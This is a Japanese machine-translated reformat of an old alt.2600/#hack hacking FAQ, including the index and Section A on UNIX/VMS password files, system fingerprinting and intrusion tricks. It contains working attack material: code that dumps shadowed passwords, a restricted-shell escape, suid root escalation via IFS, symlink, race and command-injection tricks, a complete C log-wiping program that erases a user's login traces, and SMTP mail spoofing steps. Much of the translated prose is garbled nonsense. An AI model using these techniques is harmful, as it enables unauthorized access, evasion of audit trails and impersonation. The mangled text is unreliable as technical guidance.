alt.2600 hackF.A.Q. J
機械翻訳のものをフォーマットしなおしたものです。
それなり分かる人には分かるのでこのままにします。
ぜんぜん分からないって人は少しU*IXの勉強が必要かもしれません。
原文は多分そこらじゅうにあるので、探してみてください。
windows95セクションは”かくし味”さんに訳してもらいました。
ありがとうございます。
The
alt.2600/#Hack F.A.Q.
also incorporates new Windoz 95 Section
Beta Revision .014
Version 4.0
Incorporating The New Crackers Guide
by
The Hawk
Sysadmin alt.2600
Moderator
Greets go out to:
A-Flat, Al, Aleph1, Bluesman, Cavalier, Cruiser, C-Curve,
DeadKat, Disorder, Edison, Hobbit, KCrow, Major, Marauder,
Novocain, Outsider,The Hawk Presence, Rogue Agent, sbin,
Taran King, Theora, ThePublic, Tomes, TheSaint and Xer0.
We work in the dark
We do what we can
We give what we have
Our doubt is our passion,
and our passion is our task
The rest is the madness of art.
-- Henry James
3つの新しいセクションが,バージョン4に加えられている。
そして,ずっと人気のある要求(新しいクラッカー)へのwin95セクションが案内し,
最期におはこの行為者Newsreader/Eのための通し番号を登録した。
Mailer・ニュース'n'電子メールのベスト・ハッカー
セクションA: コンピュータ
U 01. どのようにして私はUNIXの下のパスワードファイルをアクセスするか?
U 02. どのようにして私はUNIXパスワードにひびを入れるか?
03. パスワードは何を暗くしているか?
04. どこでもしそれが暗くされれば,私はパスワードファイルを見つけるかもしれないか?
05. NIS/ypは何であるか?
06. 不思議なそれらの特徴は,コンマのあとに私のpasswdファイルの中で何であるか?
07. どのようにして私はVMSの下のパスワードファイルをアクセスするか?
08. どのようにして私はVMSパスワードにひびを入れるか?
N 09. 何がVMSの上でシステムを丸太に切ることができるか?
N 10. avaliable privelegesは,VMSの上で何システムであるか?
U 11. どのようにして私は限られた貝殻の起こるか?
12. どのようにしてsuidスクリプトあるいはプログラムから私は根を獲得するか?
13. どのようにして私がシステムから存在を消し,丸太に切るか?
14. どのようにして私はfakemailを送るか?
U 15. どのようにして私に贋物なポストを表し,UseNetへメッセージをコントロールするか?
16. どのようにして私はIRCの上でChanOpを叩き切るか?
17. どのようにして私は,私の本当のユーザー名を隠すために,IRCクライアントを修正するか?
18. 私がそれらに奇妙な特徴のディレクトリへ変化する方法?
19. イーサネットは何を嗅いでいるか?
U 20. インターネットは何Outdialであるか?
21. いくらかのインターネットは,何Outdialsであるか?
22. このシステムは,何であるか?
U 23. デフォルトが何であり,XXXの理由を説明するか?
24. 何,ポートXXXはであるか?
25. trojan/worm/virus/logicが何であり,爆弾を投下するか?
26. どのようにして私はウイルスからそのような私自身を保護することができるか?
27. どこで私はウイルスについてのもっと多い情報を得ることができるか?
28. Cryptoxxxxxxxは何であるか?
29. PGPは何であるか?
U 30. 大嵐は何であるか?
U 31. 匿名のremailerは,何であるか?
U 32. アドレスは,匿名のいくらかのremailersの何であるか?
33. どのようにして私はコピー保護を負かすか?
34. 127.0.0.1は何であるか?
35. どのようにして私は和らげられたnewsgroupへポストするか?
N 36. どのようにして私はUsenetへ電子メール経由でポストするか?
N 37. どのようにして私はBIOSパスワードを負かすか?
95のWindozセクション
N 1. どのようにして私がWin 95N2にパスワードファイルを叩き切るとする。
N 2. どのようにして私がワークステーションにipアドレス/ゲートウェイetc を与えるとする。
N 3. どのようにして私が勝利95のインターネットへ接続するとする。
おはこ行為者セクション
N 1. おはこの行為者のための認可された活性化キーは,何である。
新しいクラッカーガイド
セクションB: 電話法
01. 赤い箱は,何であるか?
02. どのようにして私は赤い箱を作るか?
U 03. どこで私は6.5536Mhz結晶に着くことができるか?
04. どのpayphonesの上で赤い箱が働くだろうか?
05. どのようにして私は赤い箱の市内通話を作るか?
05. 青い箱は,何であるか?
U 07. 青い箱は,まだ働くか?
U 08. ブラックボックスは何であるか?
09. すべて絵の具箱は何をするか?
10. ANACは何数であるか?
U 11. ANACは何私のエリアのための数であるか?
12. ringbackは何数であるか?
U 13. ringbackは何私のエリアのための数であるか?
14. ループは何であるか?
U 15. ループは私のエリアで何であるか?
16. CNAは何数であるか?
U 17. 電話会社は,何私のエリアのためのCNA数であるか?
18. いくらかの数は,常に忙しく聞こえ何であるか?
19. いくらかの数は,一時的に電話サービスを切り離し何であるか?
N 20. 代理人は何試験装置であるか?
N 21. 代理人は,私のエリアで何試験装置であるか?
22. 何がスキャンしているか?
23. 非合法にスキャンしているか?
24. どこで私はラインマンのhandsetを買うことができるか?
25. DTMFは何周波数であるか?
U 26. 周波数は電話トーンの何であるか?
27. すべての* (小娘)は,何である。コード?
U 28. 周波数コードレス電話は,何に作用するか?
29. Caller-IDは何であるか?
N 30. どのようにして私はCaller-IDをブロックするか?
31. PBXは何であるか?
32. VMBは何であるか?
N 33. 何ABCDはトーンであるか?
セクションC: リソース
U 01. 何いくらかのftpサイトがハッカーにとって興味深いか?
02. 何いくらかのfspサイトがハッカーにとって興味深いか?
U 03. 何いくらかのnewsgroupsがハッカーにとって興味深いか?
U 04. 何いくらかのtelnetサイトがハッカーにとって興味深いか?
U 05. 何いくらかのgopherサイトがハッカーにとって興味深いか?
U 06. いくらかのWWW(WWW)は,何である。ハッカーへの興味深いサイト?
07. 何いくらかのIRCチャンネルがハッカーにとって興味深いか?
U 08. 興味深いいくらかのBBSのものは,ハッカーへ何であるか?
U 09. 何いくらかの本がハッカーにとって興味深いか?
10. 何いくらかのビデオがハッカーにとって興味深いか?
U 11. 何いくらかの郵送先名簿がハッカーにとって興味深いか?
U 12. 何いくらかのプリントマガジンがハッカーにとって興味深いか?
13. 何いくらかのe-zinesがハッカーにとって興味深いか?
14. 何いくらかの組織がハッカーにとって興味深いか?
N 15. 何いくらかのラジオプログラムがハッカーにとって興味深いか?
16. どこで私は磁気のストライプencoder/decoderを買うことができるか?
17. 私がどのようにしてそれらを得虹は,何本であるか?
セクションD: 2600
01. alt.2600は何であるか?
02. 何が"2600"をする。意味するか?
03. オンラインの2600の利用できるバージョンはあるか?
04. 私は,少しも書店で2600を見つけることができない。私は何をすることができるか?
05. 2600のコストもっと新聞雑誌売店で買うことを承諾するか?
セクションE: 雑物
01. XXXは何を表すか?
02. どのようにしてもし有効なクレジットカード番号を持っていれば,私は終止するか?
U 03. 銀行は,このクレジットカード何を発行したか?
N 04. 設計は,磁気のストライプカードについてのデータの何であるか?
05. 叩き切る倫理学?
06. どこで私はalt.2600/#hack FAQのコピーを得ることができるか?
U == は,alt.2600/#hack FAQの最後の解放以来更新した。
N == は,alt.2600/#hack FAQの最後の解放以来新しく
セクションA: コンピュータ
~~~~~~~~~~~~~~~~~~~~~~~~~~
01.どのようにして私はUNIXの下のパスワードファイルをアクセスするか?
標準のUNIXの中で,パスワードファイルは,/etc/passwdである。
付きまとっているNIS/ypかパスワードのどちらかのUNIXシステムの上に,多くのパスワードデータが,どこかよそにあるかもしれない。
パスワードファイルの記入が,フィールド範囲を定められた7つのコロンで構成されている。
ユーザー名は,
パスワード(そして任意のパスワード老いデータ)を暗号化した。
ユーザ数
グループ数
GECOS情報
ホームディレクトリ
貝殻
]
] /etc/passwdからのサンプル記入:
]
] will:5fg63fhD3d5gh:9406:12:Will Spencer:/home/fsg/will:/bin/bash
]
挫け,このpasswdファイルラインは見える。
ユーザー名: will
パスワードを暗号化した。: 5fg63fhD3d5gh
ユーザ数: 9406
グループ数: 12
GECOS情報: Will Spencer
ホームディレクトリ: /home/fsg/will
貝殻: /bin/bash
02.どのようにして私はUNIXパスワードにひびを入れるか?
人気のある信念に反して,UNIXパスワードをdecryptedすることができない。
UNIXパスワードが一つの方法機能で暗号化されている。
ログインプログラムは,あなたが"password:"で入るテキストを暗号化する。
プロンプトは,あなたのパスワードの暗号化されたフォームに対するその暗号化された
ストリングと比較する。
ソフトウェアにひびを入れているパスワードは,wordlistsを使う。
wordlistのそれぞれの言葉が暗号化されており,結果は,ターゲットパスワードの
暗号化されたフォームにたとえられている。
ベストUNIXのためのプログラムにひびを入れて,パスワードは,アレックMuffett
によって現在のところひびである。PC-DOSにとって,使用への最良のパッケージは,
現在のところ優秀品である。優秀品は,clark.net/pub/jcase/からftp経由で利用できる。
03. パスワードは何を暗くしているか?
パスワード暗くすることは,/etc/passwdの暗号化されたパスワードフィールドが
特別なトークンでいれ代わり,暗号化されたパスワードが普通のシステムユーザ
によって読みやすくない別々のファイルで蓄えられている,安全システムである。
多くの(しかしないすべての)の上で付きまとっているパスワードを負かす。
システム,getpwent()へ継続的な通話を使うプログラムを書く。パスワード
ファイルを得る。
例:
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,
p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir,
p->pw_shell);
}
04. どこでもしそれが暗くされれば,私はパスワードファイルを見つけるかもしれないか?
Unix Path Token
-----------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files/<first letter #
of username>/<username>
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/<first letter *
of username>/<username>
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
<optional NIS+ private secure
maps/tables/whatever>
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
05. NIS/ypは何であるか?
NIS(ネットワーク情報システム) 何がかつてyp(イエローページ)として
知られたための現在の名前でNISのための目的は,パスワードデータを含めて
形状情報を共有するネットワークの上で多くの機械を許すことである。
NISがシステム安全を促進することを予定されていない。もしあなたのシステムが
NISを使えば,あなたは,これのようなラインを含んでいる非常に短い/etc/passwd
ファイルを持っているだろう。
+::0:0:::
本当のパスワードを見るために,ファイルはこのコマンドを使う。"ypcat
passwd"
06. 不思議なそれらの特徴は,コンマのあとに私のpasswdファイルの中で何であるか?
特徴はパスワード老いデータである。
システム長官が時間指定した後でパスワード老いはパスワードをユーザに変えさせる。
それを変える前にパスワード老いは一定数の週の間またパスワードをユーザに保たせる
ことができる。
]
]パスワード老いの/etc/passwdからのサンプル記入は,以下をインストールした。
]
] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
]
暗号化されたパスワードフィールドでコンマに注意しなさい。
特徴は,コンマパスワード老い機構によって使われる。
]
] パスワード老い特徴上から例:
]
] M.z8
]
4つの特徴は,次のように解釈されている。
1: 変化せずに週パスワード最大数を使うことができる。
2: 変化する前に週最小の数がパスワード使われなければならない。
3&4: 前回パスワードが1970以来の週の数で変えられた。
3つの特例が注意されるべきだ。
第一および第二の特徴は,取りかかられた'..'である。
the user will be forced to change his/her passwd the next time he/she logs in.
passwdプログラムはそのときpasswd老い特徴を取り去り,ユーザは
再びパスワード老い要求に服従しないだろう。
第3と4番目の特徴は,取りかかられた'..'である。
the user will be forced to change his/her passwd the next time he/she logs in.
パスワード老いは,第一および第二の特徴によって明らかにされ,そのとき起こるだろう。
最初の特徴(MAX)
第2の特徴(分)以下であり,ユーザはhis/herパスワードを変えることを許されていない。
唯一の根は,そのユーザパスワードを変えることができる。
また,suコマンドがパスワード老いデータをチェックしないことが注意されるべきだ。
終了されたパスワードのアカウントは,パスワードを変えるために,押しつけられている
ことへsu'dかもしれない。
Password Aging Codes
+------------------------------------------------------------------------+
| |
| Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H |
| Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
| |
| Character: I J K L M N O P Q R S T U V W X Y Z a b |
| Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 39 |
| |
| Character: c d e f g h i j k l m n o p q r s t u v |
| Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
| |
| Character: w x y z |
| Number: 60 61 62 63 |
| |
+------------------------------------------------------------------------+
07. どのようにして私はVMSの下のパスワードファイルをアクセスするか?
しかしながら、VMSの下で,パスワードファイルは,UNIXと異なって
SYS$SYSTEM:SYSUAF.DAT.である。そして,大部分のユーザは,パスワード
ファイルを読むために,アクセスを持たない。
08. どのようにして私はVMSパスワードにひびを入れるか?
SYSUAF.DATの暗号化されたデータに対する暗号化された言葉の結果と
比較するために,SYS$GETUAF機能を使うプログラムを書きなさい。
CHECK_PASSWORDとGUESS_PASSWORD2つのそのようなプログラムが
知られており,存在しなさい。
09. 何がVMSの上でシステムを丸太に切ることができるか?
調査のためにVMSシステムの事実上あらゆるアスペクトを丸太に切ることができる。
終止するために,あなたのシステムについての会計学の地位はコマンドショー
会計学を使う。
システム会計学は,展望(CPU時間のようにプリンタ使用などを丸太に切っている
リソース)思っているシステムからの機械の使用についての情報を記録するための
施設である。
システム会計検査は,安全のための情報を丸太に切るねらいを終える。
会計学を可能にする。
$ SET ACCOUNTING [/ENABLE=(Activity...)]
また,会計学ログファイルSYS$MANAGER:ACCOUNTING.DAT.へこれ情報を丸太に切って,
思って,これが可能にし,現在のログファイルを締め,より高いバージョン番号の
新しいものを開くことのために使われている。
次の活動を丸太に切ることができる。
BATCH バッチ・ジョブの終了は,対話的な対話的なジョブ終了
DETACHED Termination of a detached job
IMAGE Image execution
INTERACTIVE Interactive job termination
LOGIN_FAILURE Login failures
MESSAGE Users messages
NETWORK Network job termination
PRINT Print Jobs
PROCESS Any terminated process
SUBPROCESS Termination of a subprocess
会計検査は使う。
$ SET AUDIT [/ENABLE=(Activity...)]
/ALARM修飾語は,安全オペレータとして賛成されたすべてのターミナル
へアラームを上げることのために使われている。
そして,あなたが安全特権を必要とすることを意味する。
あなたは,$ SHOW AUDIT /ALLを用いた安全会計検査形状を決定することができる。
次の活動を丸太に切るために,安全会計検査官を形成することができる。
ACL Access Control List requested events
AUTHORIZATION Modification to the system user
authorization file
SYS$SYSTEM:SYSUAF.DAT
BREAKIN Attempted Break-ins
FILE_ACCESS File or global section access
INSTALL Occurrence of any INSTALL operations
LOGFAILURE Any login failures
LOGIN A login attempt from various sources
LOGOUT Logouts
MOUNT Mount or dismount requests
10. avaliable privelegesは,VMSの上で何システムであるか?
ACNT Allows you to restrain accounting messages
ALLSPOOL Allows you to allocate spooled devices
ALTPRI Allot Priority. This allows you to set any priority
value
BUGCHK Allows you make bug check error log entries
BYPASS Enables you to disregard protections
CMEXEC/
CMKRNL Change to executive or kernel mode. These privileges
allow a process to execute optional routines with
KERNEL
and EXECUTIVE access modes. CMKRNL is the most
powerful
privilege on VMS as anything protected can be accessed
if you have this privilege. You must have these
privileges to gain access to the kernel data
structures
directly.
DETACH This privilege allow you to create detached processes
of
arbitrary UICs
DIAGNOSE With this privilege you can diagnose devices
EXQUOTA Allows you to exceed your disk quota
GROUP This privilege grants you permission to affect other
processes in the same rank
GRPNAM Allows you to insert group logical names into the
group
logical names table.
GRPPRV Enables you to access system group objects through
system protection field
LOG_IO Allows you to issue logical input output requests
MOUNT May execute the mount function
NETMBX Allows you to create network connections
OPER Allows you to perform operator functions
PFNMAP Allows you to map to specific physical pages
PHY_IO Allows you to perform physical input output requests
PRMCEB Can create permanent common event clusters
PRMGBL Allows you to create permanent global sections
PRMMBX Allows you to create permanent mailboxes
PSWAPM Allows you to change a processes swap mode
READALL Allows you read access to everything
SECURITY Enables you to perform security related functions
SETPRV Enable all privileges
SHARE Allows you to access devices allocated to other users.
This is used to assign system mailboxes.
SHMEM Enables you to modify objects in shared memory
SYSGBL Allows you to create system wide permanent global
sections
SYSLCK Allows you to lock system wide resources
SYSNAM Allows you to insert in system logical names in the
names table.
SYSPRV If a process holds this privilege then it is the same
as
a process holding the system user identification code.
TMPMBX Allows you create temporary mailboxes
VOLPRO Enables you to override volume protection
WORLD When this is set you can affect other processes in the
world
あなたのプロセスが何の特権で走っているかを決定することは,コマンドを発行する。
$ show proc/priv
11. どのようにして私は限られた貝殻の起こるか?
みすぼらしく実行された限られた貝殻の上で,あなたは,貝殻機能の特色をなすプログラムを
走らせることによって,限られた環境の起こることができる。
適例はviである。viを走らせ,このコマンドを使いなさい。
:set shell=/bin/sh
そのときこのコマンドを使っている貝殻:
:shell
あなたの限られた貝殻は,あなたが"cd"を使うことを妨げる。
あなたのアカウントとあなたの中へcd ftpを命令しなさい。
12. どのようにしてsuidスクリプトあるいはプログラムから私は根を獲得するか?
1. IFSを変えなさい。
プログラムは,system()を用いたどんな他のプログラムでも呼ぶ。
機能通話,あなたは,IFSを変えることによってそれをだまして奪うことができるかもしれない。
IFSは,議論の範囲を定めるために貝殻が使う内部のフィールドセパレータである。
プログラムはこれのようなラインを含む。
system("/bin/date")
そしてあなたが'/'貝殻へIFSを変え,それらは進むラインを解釈する。
bin date
今,あなたは"bin"と呼ばれたパスで自分のプログラムを持っている。
suidプログラムは,/bin/dateの代わりにあなたのプログラムを走らせるだろう。
IFSを変えるために,このコマンドを使いなさい。
IFS='/';export IFS # Bourne Shell
setenv IFS '/' # C Shell
export IFS='/' # Korn Shell
2.-iへスクリプトをつなぎなさい。
"-i"と名づけられたシンボリックリンクを作り出しなさい。
プログラムを走らせること
"-i"
インタプリタ貝殻(/bin/sh)を引き起こすだろう。
対話的なモードで始まる。これは,suid貝殻スクリプトの上でしか働かない。
例:
% ln suid.sh -i
% -i
#
3. 競争状態を開発しなさい。
カーネルが/bin/shをロードしている間に,別のプログラムのプログラムへ
シンボリックリンクをもとの場所へ戻しなさい。
例:
nice -19 suidprog ; ln -s evilprog suidroot
4. 悪い入力をプログラムに送りなさい。
プログラムの名前と同じコマンドラインの上の別々のコマンドを呼び出しなさい。
例:
suidprog ; id
13. どのようにして私がシステムから存在を消し,丸太に切るか?
/etc/utmp,/usr/adm/wtmpおよび/usr/adm/lastlogを編集しなさい。
あなたが特にこの目的のために書かれたプログラムを使わなければならなく,
これらは,手でviで編集することができるテキストファイルではない。
例:
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog),
0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
14. どのようにして私はfakemailを送るか?
Telnet機械の25を向けるために,あなたは起こるらしいことをメールに望む。
この例としてメッセージを入れなさい。:
HELO bellcore.com
MAIL FROM:Voyager@bellcore.com
RCPT TO:president@whitehouse.gov
DATA
Please discontinue your silly Clipper initiative.
.
QUIT
RFC931を持っているシステムの上で:"からあなたのspoofing"MAIL
を実行した。ラインは働かないだろう。
あなた自身に最初のfakemailを送るによる前にテスト
詳しくはARPAインターネットテキストmessages."のフォーマットのために
822のRFC"Standardを読みなさい。
15. どのようにして私に贋物なポストを表し,UseNetへメッセージをコントロールするか?
あまりにもぐちゃぐちゃで読めませんでした、申し訳ないですが、省きます。
16. どのようにして私はIRCの上でChanOpを叩き切るか?
残りのIRCから裂かれているサーバーを見つけなさい。そして,そこであなたが,
上にChanOpがほしいチャンネルの名前を用いて,自分のチャンネルを作り出す。
そのサーバーがネットへ再結合する時,あなたは本当のチャンネルの上でChanOp
を持っているだろう。もしあなたがサーバーの上でServerOpを持っていれば,
故意にあなたはそれに割れさせることができる。
17. どのようにして私は,私の本当のユーザー名を隠すために,IRCクライアントを修正するか?
cs.bu.edu/irc/clientsからIRCクライアントを得なさい。見つけるのがあなたが
捜しているコードソースコードファイルirc.cとctcp.c.を見,公正に簡単だ。
それを変えなさい。irc.cでユーザー名コードを変え,ctcp.c.のctcp情報コード
はコンパイルし,あなたのクライアントを走らせなさい。
diffsは,IRCクライアントのサンプル駄馬からである。
あなたが何のIRCクライアントバージョンを走らせているかをあてにして,
あなたのクライアントコードは,わずかに変わるだろう。
*** ctcp.c.old Wed Feb 10 10:08:05 1993
--- ctcp.c Fri Feb 12 04:33:55 1993
***************
*** 331,337 ****
struct passwd *pwd;
long diff;
int uid;
! char c;
/*
* sojge complained that ircII says 'idle 1 seconds'
--- 331,337 ----
struct passwd *pwd;
long diff;
int uid;
! char c, *fing;
/*
* sojge complained that ircII says 'idle 1 seconds'
***************
*** 348,354 ****
if (uid != DAEMON_UID)
{
#endif /* DAEMON_UID */
! if (pwd = getpwuid(uid))
{
char *tmp;
--- 348,356 ----
if (uid != DAEMON_UID)
{
#endif /* DAEMON_UID */
! if (fing = getenv("IRCFINGER"))
! send_ctcp_reply(from, ctcp->name, fing,
diff, c);
! else if (pwd = getpwuid(uid))
{
char *tmp;
*** irc.c.old Wed Feb 10 06:33:11 1993
--- irc.c Fri Feb 12 04:02:11 1993
***************
*** 510,516 ****
malloc_strcpy(&my_path, "/");
if (*realname == null(char))
strmcpy(realname, "*Unknown*", REALNAME_LEN);
! if (*username == null(char))
{
if (ptr = getenv("USER"))
strmcpy(username, ptr, NAME_LEN);
--- 510,518 ----
malloc_strcpy(&my_path, "/");
if (*realname == null(char))
strmcpy(realname, "*Unknown*", REALNAME_LEN);
! if (ptr = getenv("IRCUSER"))
! strmcpy(username, ptr, NAME_LEN);
! else if (*username == null(char))
{
if (ptr = getenv("USER"))
strmcpy(username, ptr, NAME_LEN);
c ya
the
hawk -----------------
Sysadmin alt.2600 |
moderator -----------------
18. 私がそれらに奇妙な特徴のディレクトリへ変化する方法?
これらのディレクトリは,情報(しばしばwarez(コマーシャルのソフトウェア))
を隠そうとしている人々によって,しばしば使われている。
奇妙なこれらの特徴が何であるかを決定することをあなたがすることができる
いくつかの物がある。人は,あなたにもっと多い情報をlsに与えさせるlsコマンドへ
議論を使うつもりだ。
lsのための人ページから:
-F 後端の「/」(後端の「@」シンボルで印をつけられる後端の
「*」とシンボリックリンクで印をつけられる実行可能なファイル)
で印をつけられるF原因ディレクトリ
-q 特徴「?」としてのファイル名の非グラフィック特徴の力印刷
-b octalの\ddd表記法の非グラフィック特徴の力印刷
たぶん,最も役立つツールは,単に"lsに-alfilename"を表すことである。
あなたの地方の機械の上のファイルとしての遠いftpサイトのディレクトリを救う。
そのときあなたは"cat-t-v-efilename"をすることができる。
正確に奇怪なそれらの小量特徴が何であるかを見る。
猫のための人ページから:
- v原因非印刷特徴(タブ新ラインフォームを除いてはえさとする)
展示される。
制御文字が,(<Ctrl>x)として展示されている。そこで,Xは,<Ctrl>で押されたキーである。
キー(例えば,<Ctrl>mがとして展示されている)
The <Del>
特徴(octal0177)
として印刷されているか?
非ASCII 特徴(高いビットセットで)
m-xとして印刷されており,そこで,xは,低いオーダー7ビットによって指定された特徴である。
- 印刷されたであるt原因タブは,と同じくらいのフィードを形成する。
これ もし-vオプションが指定されなければ,オプションが無視されている。
- それぞれのライン(新ラインを優先して)の終わりに「ドル」特徴がeによって印刷させられる。
もし-vオプションが置かれなければ,このオプションは無視されている。
ディレクトリ名は,<スペース>を含んでいる。
<タブ>
あなたは,引用符で全体のディレクトリ名を囲む必要があるだろう。
例:
cd"..<タブ>"
IBM-PCの上で,あなたは,<ALT>を抑えることによって特別なこれらの特徴
を入れるかもしれない。
キーあなたの数値のkeypadの上の特別な特徴の小数の値を入れる。
あなたは<ALT>をリリースする。
キー(特別な特徴)は,あなたのスクリーンの上に現われるべきだ。
ASCIIチャートが非常に役に立つかもしれない。
時々,人々は,(中断する)のように彼らに標準のいくらかのstty制御文字の
ディレクトリを作り出すことがある。
(intr)
最初に別の特徴へqustionで制御文字を変えるユーザsttyそれらのあなた
ディレクトリに入る。
sttyのための人ページから:
割り当てをコントロールしなさい。
C(制御文字があり消す)への制御文字Cセット制御文字は殺す。そして,
eof・eol・swtch(転換する)断念し,intr(阻止する)は,suspを止め,スタートする。
スタートしなさい,停止は制御文字C割り当てのためのありそうな制御特徴として利用できる。
Cはcaret(^)によって先に立たれている。
である類似の制御文字(例えば,は(貝殻<Ctrl>dから逃げた)である)
(使われたそのとき値)は。 ?ある。
通訳した未定義であることと同じくらい解釈されたを削除しなさい。)
あなたの現在のstty設定を見て,ものが問題どちらをあなたにさせているかを
決定するために,stty-aコマンドを使いなさい。
19. イーサネットは何を嗅いでいるか?
イーサネット嗅ぐことが(ソフトウェアで)聞いている。
パケットのための生のイーサネットディバイスへ興味あなた
あなたのソフトウェアが確かな規準に合うパケットを見る時,それはファイル
へそれを丸太に切る。おもしろいパケットのための共通規準は,"login"
のような言葉を含むもの最もである。"password."
ここに少数のそれであり,多くのイーサネットsniffersが利用でき,
今あなたのシステムの上であるかもしれない。
OS Sniffer
~~ ~~~~~~~
HP/UX nettl (monitor) & netfmt (display)
nfswatch /* Available via anonymous ftp
*/
Irix nfswatch /* Available via anonymous ftp
*/
Etherman
SunOS etherfind
nfswatch /* Available via anonymous ftp
*/
Solaris snoop
DOS ETHLOAD /* Available via anonymous ftp as
*/
/* ethld104.zip
*/
The Gobbler /* Available via anonymous ftp
*/
LanPatrol
LanWatch
Netmon
Netwatch
Netzhack /* Available via anonymous ftp at
*/
/*
mistress.informatik.unibw-muenchen.de */
/* /pub/netzhack.mac
*/
Macintosh Etherpeek
Here is source code for an ethernet sniffer:
*ここにイーサネットを嗅ぐコードがあったんですが原文参照のこと
20. インターネットは何Outdialであるか?
あなたが外でダイヤルすることを使うことができ,インターネットoutdialは,
インターネットへつながれたモデムである。
普通のoutdialsは,ただ地方の数を呼ぶだろう。神(グローバルなOutDial)
長距離を呼ぶことをできる。Outdialsは,長距離BBSのものを呼ぶ安い方法である。
21. いくらかのインターネットは,何Outdialsであるか?
かなりのダイアルリストがあったのですが、みんなマスクされてるし
日本からやる人は居ないと思うので省略。
22. このシステムは,何であるか?
AIX
~~~
IBM AIX Version 3 for RISC System/6000
(C) Copyrights by IBM and by others 1982, 1990.
login:
[それがそれ唯一のUNIXシステムであるので,あなたはAIXシステムを知っているだろう。]
[スクリーンをきれいにし,底の近くのログインプロンプトを発行する。]
[スクリーン]
AS/400
~~~~~~
AS/400
~~~~~~
UserID?
Password?
かつてタイプはメインを行く。
CDC Cyber
~~~~~~~~~
WELCOME TO THE NOS SOFTWARE SYSTEM.
COPYRIGHT CONTROL DATA 1978, 1987.
88/02/16. 02.36.53. N265100
CSUS CYBER 170-730. NOS 2.5.2-678/3.
FAMILY:
正常にあなたはファミリープロンプトでただリターンを打つだろう。
次のプロンプトは,以下のとおりである。
USER NAME:
CISCO Router
~~~~~~~~~~~~
FIRST BANK OF TNO
95-866 TNO VirtualBank
REMOTE Router - TN043R1
Console Port
SN - 00000866
TN043R1>
DECserver
~~~~~~~~~
DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
DPS502-DS700
(c) Copyright 1992, Digital Equipment Corporation - All Rights
Reserved
Please type HELP if you need assistance
Enter username> TNO
Local>
Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
MPE XL:
EXPECTED A :HELLO COMMAND. (CIERR 6057)
MPE XL:
EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)
MPE XL:
GTN
~~~
WELCOME TO CITIBANK. PLEASE SIGN ON.
XXXXXXXX
@
PASSWORD =
@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PLEASE ENTER YOUR ID:-1->
PLEASE ENTER YOUR PASSWORD:-2->
CITICORP (CITY NAME). KEY GHELP FOR HELP.
XXX.XXX
PLEASE SELECT SERVICE REQUIRED.-3->
Lantronix Terminal Server
~~~~~~~~~~~~~~~~~~~~~~~~~
Lantronix ETS16 Version V3.1/1(940623)
Type HELP at the 'Local_15> ' prompt for assistance.
Login password>
Meridian Mail (Northern Telecom Phone/Voice Mail System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MMM MM MERIDIAN
MMMMM MMMMM
MMMMMM MMMMMM
MMM MMMMM MMM MMMMM MMMMM
MMM MMM MMM MMMMMM MMMMMM
MMM MMM MMM MMM MMM MMM
MMM MMM MMM MMMMM MMM
MMM MMM MMM MMM MMM
